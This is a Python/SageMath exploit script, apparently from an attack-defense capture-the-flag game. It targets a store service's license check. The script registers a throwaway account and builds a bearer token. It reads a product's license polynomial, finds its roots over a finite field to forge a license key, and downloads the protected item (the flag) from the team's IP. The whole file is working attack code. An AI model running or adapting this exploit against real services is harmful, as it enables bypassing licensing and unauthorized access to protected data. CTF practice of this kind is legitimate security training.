service4-store1-vuln2-roots.sage

#!/bin/env python3
import base64
import random
import requests
import string
import sys


def random_string(min, max):
    letters = string.ascii_letters + string.digits
    return ''.join(random.choice(letters) for i in range(random.randint(min, max)))


def num_to_list(x):
    if x < 26:
        return [x]
    return [x % 26] + num_to_list(x//26)


def license_to_string(x):
    alph = string.ascii_uppercase
    lic = ''.join([alph[i] for i in num_to_list(x)])
    while len(lic) % 7 != 0:
        lic += "A"
    return '-'.join([lic[i:i+7] for i in range(0, len(lic), 7)])


def exploit(ip, flag_id):
    username = random_string(16, 24)
    password = random_string(12, 24)
    r = requests.post(f'http://{ip}:5000/api/register',
                      data={'username': username, 'password': password}, timeout=5)
    sessionData = r.json()
    token = 'Bearer ' + \
        base64.b64encode(
            (str(sessionData['user_id'])+':'+sessionData['session']).encode()).decode()
    r = requests.get(f'http://{ip}:5000/api/products/{flag_id}',
                     headers={'Authorization': token}, timeout=5)

    product_data = r.json()
    mod = int(product_data["license"]["mod"])
    poly = [int(x) for x in product_data["license"]["poly"]]
    F = GF(mod)
    R.<x> = PolynomialRing(F)
    p = R(poly)
    roots = p.roots()
    # print(roots)
    crafted_license = license_to_string(int(roots[-1][0]))
    # print(crafted_license)

    r = requests.post(f'http://{ip}:5000/api/products/{flag_id}/download', data={
                      'license': crafted_license}, headers={'Authorization': token}, timeout=10)
    return r.text


if __name__ == "__main__":
    team_id = sys.argv[1]
    flag_id = sys.argv[2]
    ip = f"10.60.{team_id}.1"
    print(exploit(ip, flag_id))